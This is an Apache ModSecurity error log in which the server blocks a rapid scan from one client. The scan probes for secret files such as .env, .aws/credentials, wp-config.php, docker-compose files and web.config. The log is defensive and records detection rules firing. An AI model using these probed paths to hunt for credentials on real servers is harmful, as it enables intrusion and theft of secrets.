[Sat Aug 09 11:47:16.873731 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUSQAAAAg"]
[Sat Aug 09 11:47:16.873913 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUSQAAAAg"]
[Sat Aug 09 11:47:16.945518 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUSwAAAAg"]
[Sat Aug 09 11:47:16.945814 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUSwAAAAg"]
[Sat Aug 09 11:47:16.946020 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUSwAAAAg"]
[Sat Aug 09 11:47:16.966534 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUTAAAAAg"]
[Sat Aug 09 11:47:16.966794 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUTAAAAAg"]
[Sat Aug 09 11:47:16.966977 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUTAAAAAg"]
[Sat Aug 09 11:47:16.987677 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUTQAAAAg"]
[Sat Aug 09 11:47:16.988003 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUTQAAAAg"]
[Sat Aug 09 11:47:16.988295 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUTQAAAAg"]
[Sat Aug 09 11:47:17.008876 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUTgAAAAg"]
[Sat Aug 09 11:47:17.009154 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUTgAAAAg"]
[Sat Aug 09 11:47:17.009380 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUTgAAAAg"]
[Sat Aug 09 11:47:17.029833 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUTwAAAAg"]
[Sat Aug 09 11:47:17.030078 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUTwAAAAg"]
[Sat Aug 09 11:47:17.030256 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUTwAAAAg"]
[Sat Aug 09 11:47:17.050743 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUUAAAAAg"]
[Sat Aug 09 11:47:17.050991 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUUAAAAAg"]
[Sat Aug 09 11:47:17.051183 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJcZJaOhwtXACoBdcZpUUAAAAAg"]
[Sat Aug 09 11:47:17.111247 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJcZJaOhwtXACoBdcZpUUgAAAAg"]
[Sat Aug 09 11:47:17.111483 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJcZJaOhwtXACoBdcZpUUgAAAAg"]
[Sat Aug 09 11:47:17.111646 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJcZJaOhwtXACoBdcZpUUgAAAAg"]
[Sat Aug 09 11:47:17.132203 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJcZJaOhwtXACoBdcZpUUwAAAAg"]
[Sat Aug 09 11:47:17.132455 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJcZJaOhwtXACoBdcZpUUwAAAAg"]
[Sat Aug 09 11:47:17.132643 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aJcZJaOhwtXACoBdcZpUUwAAAAg"]
[Sat Aug 09 11:47:17.152910 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Aug 09 11:47:17.250777 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secrets.yml
[Sat Aug 09 11:47:17.309079 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php.ini
[Sat Aug 09 11:47:17.329798 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.user.ini
[Sat Aug 09 11:47:17.350459 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.php.ini
[Sat Aug 09 11:47:17.370965 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Sat Aug 09 11:47:17.391755 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJcZJaOhwtXACoBdcZpUXQAAAAg"]
[Sat Aug 09 11:47:17.391916 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJcZJaOhwtXACoBdcZpUXQAAAAg"]
[Sat Aug 09 11:47:17.392157 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJcZJaOhwtXACoBdcZpUXQAAAAg"]
[Sat Aug 09 11:47:17.392369 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aJcZJaOhwtXACoBdcZpUXQAAAAg"]
[Sat Aug 09 11:47:18.069970 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aJcZJqOhwtXACoBdcZpUZgAAAAg"]
[Sat Aug 09 11:47:18.070250 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aJcZJqOhwtXACoBdcZpUZgAAAAg"]
[Sat Aug 09 11:47:18.070457 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aJcZJqOhwtXACoBdcZpUZgAAAAg"]
[Sat Aug 09 11:47:18.106911 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJcZJqOhwtXACoBdcZpUZwAAAAg"]
[Sat Aug 09 11:47:18.107163 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJcZJqOhwtXACoBdcZpUZwAAAAg"]
[Sat Aug 09 11:47:18.107353 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJcZJqOhwtXACoBdcZpUZwAAAAg"]
[Sat Aug 09 11:47:18.517737 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sat Aug 09 11:47:18.539936 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml
[Sat Aug 09 11:47:18.560544 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.prod.yml
[Sat Aug 09 11:47:18.580830 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.dev.yml
[Sat Aug 09 11:47:18.601494 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aJcZJqOhwtXACoBdcZpUdAAAAAg"]
